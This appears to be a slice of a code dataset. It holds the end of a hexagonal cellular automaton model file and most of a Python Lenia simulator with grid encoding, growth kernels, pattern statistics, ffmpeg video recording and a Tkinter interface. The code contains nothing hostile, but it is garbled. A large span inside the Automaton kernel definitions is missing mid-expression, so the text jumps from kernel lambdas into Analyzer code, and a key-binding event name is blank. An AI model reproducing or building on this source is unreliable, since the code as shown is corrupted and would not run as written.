self.hexaMap[q,r]\n if hexaCell.oldState >= 1 :\n return True\n \n for cell in self.hexaMap.GetNeighbors(hexaCell):\n if cell.oldState >= 1:\n return True\n\n return False\n\n def _GetNeighborsAverage(self, hexaCell, hexMap):\n somme = 0\n cpt = 0\n for cell in hexMap.GetNeighbors(hexaCell):\n somme += cell.oldState\n cpt += 1\n\n return somme/cpt\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633500274","text":"import numpy as np # pip3 install numpy\nimport scipy # pip3 install scipy\nimport scipy.ndimage as snd\nimport reikna.fft, reikna.cluda # pip3 install pyopencl/pycuda, reikna\nfrom PIL import Image, ImageTk, ImageDraw # pip3 install pillow\ntry: import tkinter as tk\nexcept: import Tkinter as tk\nfrom fractions import Fraction\nimport copy, re, itertools, json, csv\nimport os, sys, subprocess, datetime, time\nimport warnings\nwarnings.filterwarnings('ignore', '.*output shape of zoom.*') # suppress warning from snd.zoom()\n\nP2, PIXEL_BORDER = 0,0 # 4,2 3,1 2,1 0,0\nX2, Y2 = 9,9 # 10,9 9,8 8,8 1<<9=512\nPIXEL = 1 << P2; SIZEX, SIZEY = 1 << (X2-P2), 1 << (Y2-P2)\n# PIXEL, PIXEL_BORDER = 1,0; SIZEX, SIZEY = 1280//PIXEL, 720//PIXEL # 720p HD\n# PIXEL, PIXEL_BORDER = 1,0; SIZEX, SIZEY = 1920//PIXEL, 1080//PIXEL # 1080p HD\nMIDX, MIDY = int(SIZEX / 2), int(SIZEY / 2)\nDEF_R = max(min(SIZEX, SIZEY) // 4 //5*5, 13)\nEPSILON = 1e-10\nROUND = 10\nFPS_FREQ = 20\nSTATUS = []\nis_windows = (os.name == 'nt')\n\nclass Board:\n\tdef __init__(self, size=[0,0]):\n\t\tself.names = ['', '', '']\n\t\tself.params = {'R':DEF_R, 'T':10, 'b':[1], 'm':0.1, 's':0.01, 'kn':1, 'gn':1}\n\t\tself.cells = np.zeros(size)\n\n\t@classmethod\n\tdef from_values(cls, names, params, cells):\n\t\tself = cls()\n\t\tself.names = names.copy() if names is not None else None\n\t\tself.params = params.copy() if params is not None else None\n\t\tself.cells = cells.copy() if cells is not None else None\n\t\treturn self\n\n\t@classmethod\n\tdef from_data(cls, data):\n\t\tself = cls()\n\t\tself.names = [data.get('code',''), data.get('name',''), data.get('cname','')]\n\t\tself.params = data.get('params')\n\t\tif self.params:\n\t\t\tself.params = self.params.copy()\n\t\t\tself.params['b'] = Board.st2fracs(self.params['b'])\n\t\tself.cells = data.get('cells')\n\t\tif self.cells:\n\t\t\tif type(self.cells) in [tuple, list]:\n\t\t\t\tself.cells = ''.join(self.cells)\n\t\t\tself.cells = Board.rle2arr(self.cells)\n\t\treturn self\n\n\tdef to_data(self, is_shorten=True):\n\t\trle_st = Board.arr2rle(self.cells, is_shorten)\n\t\tparams2 = self.params.copy()\n\t\tparams2['b'] = Board.fracs2st(params2['b'])\n\t\tdata = {'code':self.names[0], 'name':self.names[1], 'cname':self.names[2], 'params':params2, 'cells':rle_st}\n\t\treturn data\n\n\tdef params2st(self):\n\t\tparams2 = self.params.copy()\n\t\tparams2['b'] = '[' + Board.fracs2st(params2['b']) + ']'\n\t\treturn ','.join(['{}={}'.format(k,str(v)) for (k,v) in params2.items()])\n\n\tdef long_name(self):\n\t\t# return ' | '.join(filter(None, self.names))\n\t\treturn '{0} - {1} {2}'.format(*self.names)\n\n\t@staticmethod\n\tdef arr2rle(A, is_shorten=True):\n\t\t''' RLE = Run-length encoding: \n\t\t\thttp://www.conwaylife.com/w/index.php?title=Run_Length_Encoded\n\t\t\thttp://golly.sourceforge.net/Help/formats.html#rle\n\t\t\thttps://www.rosettacode.org/wiki/Run-length_encoding#Python\n\t\t\t0=b=. 1=o=A 1-24=A-X 25-48=pA-pX 49-72=qA-qX 241-255=yA-yO '''\n\t\tV = np.rint(A*255).astype(int).tolist() # [[255 255] [255 0]]\n\t\tcode_arr = [ [' .' if v==0 else ' '+chr(ord('A')+v-1) if v<25 else chr(ord('p')+(v-25)//24) + chr(ord('A')+(v-25)%24) for v in row] for row in V] # [[yO yO] [yO .]]\n\t\tif is_shorten:\n\t\t\trle_groups = [ [(len(list(g)),c.strip()) for c,g in itertools.groupby(row)] for row in code_arr] # [[(2 yO)] [(1 yO) (1 .)]]\n\t\t\tfor row in rle_groups:\n\t\t\t\tif row[-1][1]=='.': row.pop() # [[(2 yO)] [(1 yO)]]\n\t\t\tst = '$'.join(''.join([(str(n) if n>1 else '')+c for n,c in row]) for row in rle_groups) + '!' # \"2 yO $ 1 yO\"\n\t\telse:\n\t\t\tst = '$'.join(''.join(row) for row in code_arr) + '!'\n\t\t# print(sum(sum(r) for r in V))\n\t\treturn st\n\n\t@staticmethod\n\tdef rle2arr(st):\n\t\trle_groups = re.findall('(\\d*)([p-y]?[.boA-X$])', st.rstrip('!')) # [(2 yO)(1 $)(1 yO)]\n\t\tcode_list = sum([[c] * (1 if n=='' else int(n)) for n,c in rle_groups], []) # [yO yO $ yO]\n\t\tcode_arr = [l.split(',') for l in ','.join(code_list).split('$')] # [[yO yO] [yO]]\n\t\tV = [ [0 if c in ['.','b'] else 255 if c=='o' else ord(c)-ord('A')+1 if len(c)==1 else (ord(c[0])-ord('p'))*24+(ord(c[1])-ord('A')+25) for c in row if c!='' ] for row in code_arr] # [[255 255] [255]]\n\t\t# lines = st.rstrip('!').split('$')\n\t\t# rle = [re.findall('(\\d*)([p-y]?[.boA-X])', row) for row in lines]\n\t\t# code = [ sum([[c] * (1 if n=='' else int(n)) for n,c in row], []) for row in rle]\n\t\t# V = [ [0 if c in ['.','b'] else 255 if c=='o' else ord(c)-ord('A')+1 if len(c)==1 else (ord(c[0])-ord('p'))*24+(ord(c[1])-ord('A')+25) for c in row ] for row in code]\n\t\tmaxlen = len(max(V, key=len))\n\t\tA = np.array([row + [0] * (maxlen - len(row)) for row in V])/255 # [[1 1] [1 0]]\n\t\t# print(sum(sum(r) for r in V))\n\t\treturn A\n\n\t@staticmethod\n\tdef fracs2st(B):\n\t\treturn ','.join([str(f) for f in B])\n\n\t@staticmethod\n\tdef st2fracs(st):\n\t\treturn [Fraction(st) for st in st.split(',')]\n\n\tdef clear(self):\n\t\tself.cells.fill(0)\n\n\tdef add(self, part, shift=[0,0]):\n\t\t# assert self.params['R'] == part.params['R']\n\t\th1, w1 = self.cells.shape\n\t\th2, w2 = part.cells.shape\n\t\th, w = min(h1, h2), min(w1, w2)\n\t\ti1, j1 = (w1 - w)//2 + shift[1], (h1 - h)//2 + shift[0]\n\t\ti2, j2 = (w2 - w)//2, (h2 - h)//2\n\t\t# self.cells[j:j+h, i:i+w] = part.cells[0:h, 0:w]\n\t\tvmin = np.amin(part.cells)\n\t\tfor y in range(h):\n\t\t\tfor x in range(w):\n\t\t\t\tif part.cells[j2+y, i2+x] > vmin:\n\t\t\t\t\tself.cells[(j1+y)%h1, (i1+x)%w1] = part.cells[j2+y, i2+x]\n\t\treturn self\n\n\tdef transform(self, tx, mode='RZSF', is_world=False):\n\t\tif 'R' in mode and tx['rotate'] != 0:\n\t\t\tself.cells = snd.rotate(self.cells, tx['rotate'], reshape=not is_world, order=0, mode='wrap' if is_world else 'constant')\n\t\tif 'Z' in mode and tx['R'] != self.params['R']:\n\t\t\t# print('* {} / {}'.format(tx['R'], self.params['R']))\n\t\t\tshape_orig = self.cells.shape\n\t\t\tself.cells = snd.zoom(self.cells, tx['R'] / self.params['R'], order=0)\n\t\t\tif is_world:\n\t\t\t\tself.cells = Board(shape_orig).add(self).cells\n\t\t\tself.params['R'] = tx['R']\n\t\tif 'F' in mode and tx['flip'] != -1:\n\t\t\tif tx['flip'] in [0,1]: self.cells = np.flip(self.cells, axis=tx['flip'])\n\t\t\telif tx['flip'] == 2: self.cells[:, :-MIDX-1:-1] = self.cells[:, :MIDX]\n\t\t\telif tx['flip'] == 3: self.cells[:, :-MIDX-1:-1] = self.cells[::-1, :MIDX]\n\t\tif 'S' in mode and tx['shift'] != [0, 0]:\n\t\t\tself.cells = snd.shift(self.cells, tx['shift'], order=0, mode='wrap')\n\t\t\t# self.cells = np.roll(self.cells, tx['shift'], (1, 0))\n\t\treturn self\n\n\tdef add_transformed(self, part, tx):\n\t\tpart = copy.deepcopy(part)\n\t\tself.add(part.transform(tx, mode='RZF'), tx['shift'])\n\t\treturn self\n\n\tdef crop(self):\n\t\tvmin = np.amin(self.cells)\n\t\tcoords = np.argwhere(self.cells > vmin)\n\t\ty0, x0 = coords.min(axis=0)\n\t\ty1, x1 = coords.max(axis=0) + 1\n\t\tself.cells = self.cells[y0:y1, x0:x1]\n\t\treturn self\n\nclass Automaton:\n\tkernel_core = {\n\t\t0: lambda r: (4 * r * (1-r))**4, # polynomial (quad4)\n\t\t1: lambda r: np.exp( 4 - 1 / (r * (1-r)) ), # exponential / gaussian bump (bump4)\n\t\t2: lambda r, q=1/4: (r>=q)*(r<=1-q), # step (stpz1/4)\n\t\t3: lambda r, q=1/4: (r>=q)*(r<=1-q) + (r 0)\n\n\t\tself.m_last_center = self.m_center\n\t\tself.m_last_angle = self.m_angle\n\t\t# self.shape_last_angle = self.shape_angle\n\n\t\tself.inertia = 0\n\t\tself.m_center = None\n\t\tself.g_center = None\n\t\tself.mg_dist = 0\n\t\tself.m_shift = 0\n\t\tself.m_angle = 0\n\t\tself.m_rotate = 0\n\t\tself.mass_asym = 0\n\t\t# self.shape_major_axis = 0\n\t\t# self.shape_minor_axis = 0\n\t\t# self.shape_eccentricity = 0\n\t\t# self.shape_compactness = 0\n\t\t# self.shape_angle = 0\n\t\t# self.shape_rotate = 0 \n\t\tif m00 > EPSILON:\n\t\t\tAX, AY = A*X, A*Y\n\t\t\tm01, m10 = np.sum(AX), np.sum(AY)\n\t\t\tm02, m20 = np.sum(AX*X), np.sum(AY*Y)\n\t\t\tmx, my = self.m_center = np.array([m01, m10]) / m00\n\t\t\tmu02, mu20 = m02 - my * m01, m20 - mx * m10\n\t\t\tself.inertia = (mu20 + mu02) / m00**2\n\t\t\t\n\t\t\t# m11 = np.sum(AY*X)\n\t\t\t# mu11 = m11 - mx * m01\n\t\t\t# m1 = mu20 + mu02\n\t\t\t# m2 = mu20 - mu02\n\t\t\t# m3 = 2 * mu11\n\t\t\t# t1 = m1 / 2 / m00\n\t\t\t# t2 = np.sqrt(m2**2 + m3**2) / 2 / m00\n\t\t\t# self.shape_major_axis = t1 + t2\n\t\t\t# self.shape_minor_axis = t1 - t2\n\t\t\t# self.shape_eccentricity = np.sqrt(1 - self.shape_minor_axis / self.shape_major_axis)\n\t\t\t# self.shape_compactness = m00 / (mu20 + mu02)\n\t\t\t# self.shape_angle = np.degrees(np.arctan2(m2, m3))\n\t\t\t# if self.shape_last_angle is not None:\n\t\t\t\t# self.shape_rotate = self.shape_angle - self.shape_last_angle\n\t\t\t\t# self.shape_rotate = (self.shape_rotate + 540) % 360 - 180\n\n\t\t\tif g00 > EPSILON:\n\t\t\t\tg01, g10 = np.sum(G*X), np.sum(G*Y)\n\t\t\t\tgx, gy = self.g_center = np.array([g01, g10]) / g00\n\t\t\t\tself.mg_dist = np.linalg.norm(self.m_center - self.g_center)\n\n\t\t\tif self.m_last_center is not None and self.m_last_angle is not None:\n\t\t\t\tdm = self.m_center - self.m_last_center + self.last_shift_idx / R\n\t\t\t\tself.m_shift = np.linalg.norm(dm)\n\t\t\t\tself.m_angle = np.degrees(np.arctan2(dm[1], dm[0])) if self.m_shift >= EPSILON else 0\n\t\t\t\tself.m_rotate = self.m_angle - self.m_last_angle\n\t\t\t\tself.m_rotate = (self.m_rotate + 540) % 360 - 180\n\t\t\t\tif self.automaton.gen <= 2:\n\t\t\t\t\tself.m_rotate = 0\n\n\t\t\t\tmidpoint = np.array([MIDX, MIDY])\n\t\t\t\tX, Y = np.meshgrid(np.arange(SIZEX), np.arange(SIZEY))\n\t\t\t\tx0, y0 = self.m_last_center * R + midpoint - self.last_shift_idx\n\t\t\t\tx1, y1 = self.m_center * R + midpoint\n\t\t\t\tsign = (x1 - x0) * (Y - y0) - (y1 - y0) * (X - x0)\n\t\t\t\tself.mass_asym = np.sum(A[sign>0]) - np.sum(A[sign<0])\n\t\t\t\t# self.aaa = A.copy(); self.aaa[sign<0] = 0\n\n\tdef stat_name(self, i=None, x=None):\n\t\tif not x: x = self.STAT_HEADERS[i]\n\t\treturn '{0}={1}'.format(x, self.STAT_NAMES[x])\n\n\tdef new_segment(self):\n\t\tif self.series == [] or self.series[-1] != []:\n\t\t\tself.series.append([])\n\tdef clear_segment(self):\n\t\tif self.series != []:\n\t\t\tif self.series[-1] == []:\n\t\t\t\tself.series.pop()\n\t\t\tif self.series != []:\n\t\t\t\tself.series[-1] = []\n\tdef clear_series(self):\n\t\tself.series = []\n\n\tdef add_stat(self):\n\t\tR, T, pm, ps = [self.world.params[k] for k in ('R', 'T', 'm', 's')]\n\t\tv = [pm, ps, self.automaton.gen, self.automaton.time, \n\t\t\tself.mass/R/R, self.growth/R/R, self.inertia, \n\t\t\tself.m_shift*T, self.m_rotate*T, self.mg_dist, self.mass_asym/R/R]\n\t\t\t# self.shape_major_axis, self.shape_minor_axis,\n\t\t\t# self.shape_eccentricity, self.shape_compactness, self.shape_rotate]\n\t\tif self.series == []:\n\t\t\tself.new_segment()\n\t\tsegment = self.series[-1]\n\t\tsegment.append(v)\n\t\tif self.is_clip_segment:\n\t\t\twhile len(segment) > self.SEGMENT_LEN:\n\t\t\t\tsegment.pop(0)\n\n\tdef center_world(self):\n\t\tif self.mass < EPSILON or self.m_center is None:\n\t\t\treturn\n\t\tself.last_shift_idx = (self.m_center * self.world.params['R']).astype(int)\n\t\tself.world.cells = np.roll(self.world.cells, -self.last_shift_idx, (1, 0))\n\t\tself.total_shift_idx += self.last_shift_idx\n\n\tdef recurrence_plot(self, e=0.1, steps=10):\n\t\t''' https://stackoverflow.com/questions/33650371/recurrence-plot-in-python '''\n\t\td = scipy.spatial.distance.pdist(self.series[:, None])\n\t\td = np.floor(d/e)\n\t\td[d>steps] = steps\n\t\tZ = scipy.spatial.distance.squareform(d)\n\t\treturn Z\n\nclass Recorder:\n\tRECORD_ROOT = 'record'\n\tFRAME_EXT = '.png'\n\tVIDEO_EXT = '.mov'\n\tGIF_EXT = '.gif'\n\tANIM_FPS = 25\n\tffmpeg_cmd = ['/usr/local/bin/ffmpeg',\n\t\t'-loglevel','warning', '-y', # glocal options\n\t\t'-f','rawvideo', '-vcodec','rawvideo', '-pix_fmt','rgb24', # input options\n\t\t'-s','{}x{}'.format(SIZEX*PIXEL, SIZEY*PIXEL), '-r',str(ANIM_FPS),\n\t\t'-i','{input}', # input pipe\n\t\t# '-an', '-vcodec','h264', '-pix_fmt','yuv420p', '-crf','1', # output options\n\t\t'-an', '-vcodec','copy', # output options\n\t\t'{output}'] # ouput file\n\n\tdef __init__(self, world):\n\t\tself.world = world\n\t\tself.is_recording = False\n\t\tself.is_save_frames = False\n\t\tself.record_id = None\n\t\tself.record_seq = None\n\t\tself.img_dir = None\n\t\tself.video_path = None\n\t\tself.video = None\n\t\tself.gif_path = None\n\t\tself.gif = None\n\n\tdef toggle_recording(self, is_save_frames=False):\n\t\tself.is_save_frames = is_save_frames\n\t\tif not self.is_recording:\n\t\t\tself.start_record()\n\t\telse:\n\t\t\tself.finish_record()\n\n\tdef start_record(self):\n\t\tglobal STATUS\n\t\t''' https://trac.ffmpeg.org/wiki/Encode/H.264\n\t\t https://trac.ffmpeg.org/wiki/Slideshow '''\n\t\tself.is_recording = True\n\t\tSTATUS.append(\"> start \" + (\"saving frames\" if self.is_save_frames else \"recording video\") + \" and GIF...\")\n\t\tself.record_id = '{}-{}'.format(self.world.names[0].split('(')[0], datetime.datetime.now().strftime('%Y%m%d-%H%M%S-%f'))\n\t\tself.record_seq = 1\n\t\tself.video_path = os.path.join(self.RECORD_ROOT, self.record_id + self.VIDEO_EXT)\n\t\tself.gif_path = os.path.join(self.RECORD_ROOT, self.record_id + self.GIF_EXT)\n\t\tself.img_dir = os.path.join(self.RECORD_ROOT, self.record_id)\n\t\tif self.is_save_frames:\n\t\t\tif not os.path.exists(self.img_dir):\n\t\t\t\tos.makedirs(self.img_dir)\n\t\telse:\n\t\t\tcmd = [s.replace('{input}', '-').replace('{output}', self.video_path) for s in self.ffmpeg_cmd]\n\t\t\ttry:\n\t\t\t\tself.video = subprocess.Popen(cmd, stdin=subprocess.PIPE) # stderr=subprocess.PIPE\n\t\t\texcept FileNotFoundError:\n\t\t\t\tself.video = None\n\t\t\t\tSTATUS.append(\"> no ffmpeg program found!\")\n\t\tself.gif = []\n\n\tdef save_image(self, img, filename=None):\n\t\tself.record_id = '{}-{}'.format(self.world.names[0].split('(')[0], datetime.datetime.now().strftime('%Y%m%d-%H%M%S-%f'))\n\t\timg_path = filename + self.FRAME_EXT if filename else os.path.join(self.RECORD_ROOT, self.record_id + self.FRAME_EXT)\n\t\timg.save(img_path)\n\n\tdef record_frame(self, img):\n\t\tif self.is_save_frames:\n\t\t\timg_path = os.path.join(self.RECORD_ROOT, self.record_id, '{:03d}'.format(self.record_seq) + self.FRAME_EXT)\n\t\t\timg.save(img_path)\n\t\telse:\n\t\t\tif self.video:\n\t\t\t\timg_rgb = img.convert('RGB').tobytes()\n\t\t\t\tself.video.stdin.write(img_rgb)\n\t\tself.gif.append(img)\n\t\tself.record_seq += 1\n\n\tdef finish_record(self):\n\t\tglobal STATUS\n\t\tif self.is_save_frames:\n\t\t\tSTATUS.append(\"> frames saved to '\" + self.img_dir + \"/*\" + self.FRAME_EXT + \"'\")\n\t\t\tcmd = [s.replace('{input}', os.path.join(self.img_dir, '%03d'+self.FRAME_EXT)).replace('{output}', self.video_path) for s in self.ffmpeg_cmd]\n\t\t\ttry:\n\t\t\t\tsubprocess.call(cmd)\n\t\t\texcept FileNotFoundError:\n\t\t\t\tself.video = None\n\t\t\t\tSTATUS.append(\"> no ffmpeg program found!\")\n\t\telse:\n\t\t\tif self.video:\n\t\t\t\tself.video.stdin.close()\n\t\t\t\tSTATUS.append(\"> video saved to '\" + self.video_path + \"'\")\n\t\tself.gif[0].save(self.gif_path, format=self.GIF_EXT.lstrip('.'), save_all=True, append_images=self.gif[1:], loop=0, duration=1000//self.ANIM_FPS)\n\t\tself.gif = None\n\t\tSTATUS.append(\"> GIF saved to '\" + self.gif_path + \"'\")\n\t\tself.is_recording = False\n\nclass Lenia:\n\tMARKER_COLORS = [95,95,95,127,127,127,255,255,255]\n\tdef __init__(self):\n\t\tself.is_run = True\n\t\tself.is_once = False\n\t\tself.is_show = True\n\t\tself.is_closing = False\n\t\tself.show_what = 0\n\t\tself.is_show_markers = True\n\t\tself.stats_mode = 0\n\t\tself.stat_x = 4\n\t\tself.stat_y = 5\n\t\tself.is_show_fps = False\n\t\tself.fps = None\n\t\tself.last_time = None\n\t\tself.fore = None\n\t\tself.back = None\n\t\tself.is_layered = False\n\t\tself.is_auto_center = False\n\t\tself.is_auto_load = False\n\t\tself.trace_dir = 0\n\t\tself.trace_small = False\n\t\t''' http://hslpicker.com/ '''\n\t\tself.colormaps = [\n\t\t\tself.create_colormap(np.array([[0,0,4],[0,0,8],[0,4,8],[0,8,8],[4,8,4],[8,8,0],[8,4,0],[8,0,0],[4,0,0]])), #BCYR\n\t\t\tself.create_colormap(np.array([[0,2,0],[0,4,0],[4,6,0],[8,8,0],[8,4,4],[8,0,8],[4,0,8],[0,0,8],[0,0,4]])), #GYPB\n\t\t\tself.create_colormap(np.array([[4,0,2],[8,0,4],[8,0,6],[8,0,8],[4,4,4],[0,8,0],[0,6,0],[0,4,0],[0,2,0]])), #PPGG\n\t\t\tself.create_colormap(np.array([[4,4,6],[2,2,4],[2,4,2],[4,6,4],[6,6,4],[4,2,2]])), #BGYR\n\t\t\tself.create_colormap(np.array([[4,6,4],[2,4,2],[4,4,2],[6,6,4],[6,4,6],[2,2,4]])), #GYPB\n\t\t\tself.create_colormap(np.array([[6,6,4],[4,4,2],[4,2,4],[6,4,6],[4,6,6],[2,4,2]])), #YPCG\n\t\t\tself.create_colormap(np.array([[0,0,0],[3,3,3],[4,4,4],[5,5,5],[8,8,8]]))] #B/W\n\t\tself.colormap_id = 0\n\t\tself.set_colormap()\n\t\tself.last_key = None\n\t\tself.excess_key = None\n\t\tself.update = None\n\t\tself.clear_job = None\n\t\tself.is_save_image = False\n\n\t\tself.read_animals()\n\t\tself.world = Board((SIZEY, SIZEX))\n\t\tself.automaton = Automaton(self.world)\n\t\tself.analyzer = Analyzer(self.automaton)\n\t\tself.recorder = Recorder(self.world)\n\t\tself.clear_transform()\n\t\tself.create_window()\n\t\tself.create_menu()\n\n\tdef clear_transform(self):\n\t\tself.tx = {'shift':[0, 0], 'rotate':0, 'R':self.world.params['R'], 'flip':-1}\n\n\tdef read_animals(self):\n\t\twith open('animals.json', encoding='utf-8') as file:\n\t\t\tself.animal_data = json.load(file)\n\n\tdef load_animal_id(self, id, **kwargs):\n\t\tself.animal_id = max(0, min(len(self.animal_data)-1, id))\n\t\tself.load_part(Board.from_data(self.animal_data[self.animal_id]), **kwargs)\n\n\tdef load_animal_code(self, code, **kwargs):\n\t\tif not code: return\n\t\tid = self.get_animal_id(code)\n\t\tif id: self.load_animal_id(id, **kwargs)\n\n\tdef get_animal_id(self, code):\n\t\tcode_sp = code.split(':')\n\t\tn = int(code_sp[1]) if len(code_sp)==2 else 1\n\t\tit = (id for (id, data) in enumerate(self.animal_data) if data[\"code\"]==code_sp[0])\n\t\tfor i in range(n):\n\t\t\tid = next(it, None)\n\t\treturn id\n\n\tdef load_part(self, part, is_replace=True, is_random=False, is_auto_load=False, repeat=1):\n\t\tself.fore = part\n\t\tif part.names[0].startswith('~'):\n\t\t\tpart.names[0] = part.names[0].lstrip('~')\n\t\t\tself.world.params['R'] = part.params['R']\n\t\t\tself.automaton.calc_kernel()\n\t\tif is_replace:\n\t\t\tself.world.names = part.names.copy()\n\t\tif part.params is not None and part.cells is not None:\n\t\t\tis_life = ((self.world.params.get('kn') or self.automaton.kn) == 4)\n\t\t\twill_be_life = ((part.params.get('kn') or self.automaton.kn) == 4)\n\t\t\tif not is_life and will_be_life:\n\t\t\t\tself.colormap_id = len(self.colormaps) - 1\n\t\t\t\tself.win.title('Conway\\'s Game of Life')\n\t\t\telif is_life and not will_be_life:\n\t\t\t\tself.colormap_id = 0\n\t\t\t\tself.world.params['R'] = DEF_R\n\t\t\t\tself.automaton.calc_kernel()\n\t\t\t\tself.win.title('Lenia')\n\t\t\tif self.is_layered:\n\t\t\t\tself.back = copy.deepcopy(self.world)\n\t\t\tif is_replace and not self.is_layered:\n\t\t\t\tif not is_auto_load:\n\t\t\t\t\tself.world.params = {**part.params, 'R':self.world.params['R']}\n\t\t\t\t\tself.automaton.calc_kernel()\n\t\t\t\tself.world.clear()\n\t\t\t\tself.automaton.reset()\n\t\t\t\tif not is_auto_load:\n\t\t\t\t\tself.analyzer.reset()\n\t\t\tself.clear_transform()\n\t\t\tfor i in range(repeat):\n\t\t\t\tif is_random:\n\t\t\t\t\tself.tx['rotate'] = np.random.random() * 360\n\t\t\t\t\th1, w1 = self.world.cells.shape\n\t\t\t\t\th, w = min(part.cells.shape, self.world.cells.shape)\n\t\t\t\t\tself.tx['shift'] = [np.random.randint(d1 + d) - d1//2 for (d,d1) in [(h,h1), (w,w1)]]\n\t\t\t\t\tself.tx['flip'] = np.random.randint(3) - 1\n\t\t\t\tself.world.add_transformed(part, self.tx)\n\n\tdef check_auto_load(self):\n\t\tif self.is_auto_load:\n\t\t\tself.load_part(self.fore, is_auto_load=True)\n\n\tdef transform_world(self):\n\t\tif self.is_layered:\n\t\t\tself.world.cells = self.back.cells.copy()\n\t\t\tself.world.params = self.back.params.copy()\n\t\t\tself.world.transform(self.tx, mode='Z', is_world=True)\n\t\t\tself.world.add_transformed(self.fore, self.tx)\n\t\telse:\n\t\t\tif not self.is_run:\n\t\t\t\tif self.back is None:\n\t\t\t\t\tself.back = copy.deepcopy(self.world)\n\t\t\t\telse:\n\t\t\t\t\tself.world.cells = self.back.cells.copy()\n\t\t\t\t\tself.world.params = self.back.params.copy()\n\t\t\tself.world.transform(self.tx, is_world=True)\n\t\tself.automaton.calc_kernel()\n\n\tdef clear_world(self):\n\t\tself.world.clear()\n\t\tif self.is_layered:\n\t\t\tself.back = copy.deepcopy(self.world)\n\t\tself.automaton.reset()\n\t\tself.analyzer.reset()\n\n\tdef random_world(self):\n\t\tself.world.clear()\n\t\tborder = self.world.params['R']\n\t\trand = np.random.rand(SIZEY - border*2, SIZEX - border*2)\n\t\tself.world.add(Board.from_values(None, None, rand))\n\t\tif self.is_layered:\n\t\t\tself.back = copy.deepcopy(self.world)\n\t\tself.automaton.reset()\n\t\tself.analyzer.reset()\n\n\tdef toggle_trace(self, dir, small):\n\t\tif self.trace_dir == 0:\n\t\t\tself.trace_dir = dir\n\t\t\tself.trace_small = small\n\t\t\tself.is_auto_center = True\n\t\t\tself.is_auto_load = True\n\t\telse:\n\t\t\tself.trace_dir = 0\n\n\tdef stop_trace(self):\n\t\tself.trace_dir = 0\n\n\tdef trace_params(self):\n\t\ts = 's+' if self.trace_small else ''\n\t\tif self.trace_dir == +1:\n\t\t\tif self.analyzer.is_empty: self.key_press_internal(s+'w')\n\t\t\telif self.analyzer.is_full: self.key_press_internal(s+'q')\n\t\telif self.trace_dir == -1:\n\t\t\tif self.analyzer.is_empty: self.key_press_internal(s+'a')\n\t\t\telif self.analyzer.is_full: self.key_press_internal(s+'s')\n\n\tdef create_window(self):\n\t\tself.win = tk.Tk()\n\t\tself.win.title('Lenia')\n\t\tself.win.bind('', self.key_press_event)\n\t\tself.frame = tk.Frame(self.win, width=SIZEX*PIXEL, height=SIZEY*PIXEL)\n\t\tself.frame.pack()\n\t\tself.canvas = tk.Canvas(self.frame, width=SIZEX*PIXEL, height=SIZEY*PIXEL)\n\t\tself.canvas.place(x=-1, y=-1)\n\t\tself.panel1 = self.create_panel(0, 0)\n\t\t# self.panel2 = self.create_panel(1, 0)\n\t\t# self.panel3 = self.create_panel(0, 1)\n\t\t# self.panel4 = self.create_panel(1, 1)\n\t\tself.info = tk.Label(self.win)\n\t\tself.info.pack()\n\n\tdef create_panel(self, c, r):\n\t\tbuffer = np.uint8(np.zeros((SIZEY*PIXEL,SIZEX*PIXEL)))\n\t\timg = Image.frombuffer('P', (SIZEX*PIXEL,SIZEY*PIXEL), buffer, 'raw', 'P', 0, 1)\n\t\tphoto = ImageTk.PhotoImage(image=img)\n\t\treturn self.canvas.create_image(c*SIZEY, r*SIZEX, image=photo, anchor=tk.NW)\n\n\tdef create_colormap(self, colors):\n\t\tnval = 256 - 3\n\t\tncol = colors.shape[0]\n\t\tcolors = np.vstack((colors, np.array([[0,0,0]])))\n\t\tv = np.repeat(range(nval), 3) # [0 0 0 1 1 1 ... 252 252 252]\n\t\ti = np.array(list(range(3)) * nval) # [0 1 2 0 1 2 ... 0 1 2]\n\t\tk = v / (nval-1) * (ncol-1) # interpolate between 0 .. ncol-1\n\t\tk1 = k.astype(int)\n\t\tc1, c2 = colors[k1,i], colors[k1+1,i]\n\t\tc = (k-k1) * (c2-c1) + c1 # interpolate between c1 .. c2\n\t\treturn np.rint(c / 8 * 255).astype(int).tolist() + self.MARKER_COLORS\n\n\tdef set_colormap(self):\n\t\tself.colormap_demo = np.tile(np.arange(SIZEX), (1, SIZEY)) / SIZEX\n\n\tSHOW_WHAT_NUM = 7\n\tdef update_win(self):\n\t\tif self.stats_mode in [0, 3]:\n\t\t\tchange_range = 1 if not self.automaton.is_soft_clip else 1.4\n\t\t\tif self.show_what==0: self.draw_world(self.world.cells, 0, 1, is_shift=True, is_shift_zero=True, markers=['arrow','ruler','grid'])\n\t\t\t# if self.show_what==0: self.draw_world(self.analyzer.aaa, 0, 1, is_shift=True, is_shift_zero=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==1: self.draw_world(self.automaton.potential, 0, 2*self.world.params['m'], is_shift=True, is_shift_zero=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==2: self.draw_world(self.automaton.field, -1, 1, is_shift=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==3: self.draw_world(self.automaton.change, -change_range, change_range, is_shift=True, markers=['arrow','ruler','grid'])\n\t\t\telif self.show_what==4: self.draw_world(self.automaton.kernel, 0, 1, markers=['ruler','fixgrid'])\n\t\t\telif self.show_what==5: self.draw_world(self.automaton.fftshift(np.log(np.absolute(self.automaton.world_FFT))), 0, 5)\n\t\t\telif self.show_what==6: self.draw_world(self.automaton.fftshift(np.log(np.absolute(self.automaton.potential_FFT))), 0, 5)\n\t\t\telif self.show_what==7: self.draw_world(self.colormap_demo, 0, 1)\n\t\t\tself.img.putpalette(self.colormaps[self.colormap_id])\n\t\telif self.stats_mode in [1, 2]:\n\t\t\tself.draw_black()\n\n\t\tif self.stats_mode in [1, 2, 3]:\n\t\t\tself.draw_stats()\n\n\t\tif self.recorder.is_recording and self.is_run:\n\t\t\tself.recorder.record_frame(self.img)\n\t\tif self.is_save_image:\n\t\t\tself.recorder.save_image(self.img, filename='saved')\n\t\t\tself.is_save_image = False\n\n\t\tphoto = ImageTk.PhotoImage(image=self.img)\n\t\t# photo = tk.PhotoImage(width=SIZEX, height=SIZEY)\n\t\tself.canvas.itemconfig(self.panel1, image=photo)\n\t\tself.win.update()\n\n\tdef draw_world(self, A, vmin=0, vmax=1, is_shift=False, is_shift_zero=False, markers=[]):\n\t\tif is_shift and not self.is_auto_center:\n\t\t\tA = np.roll(A, 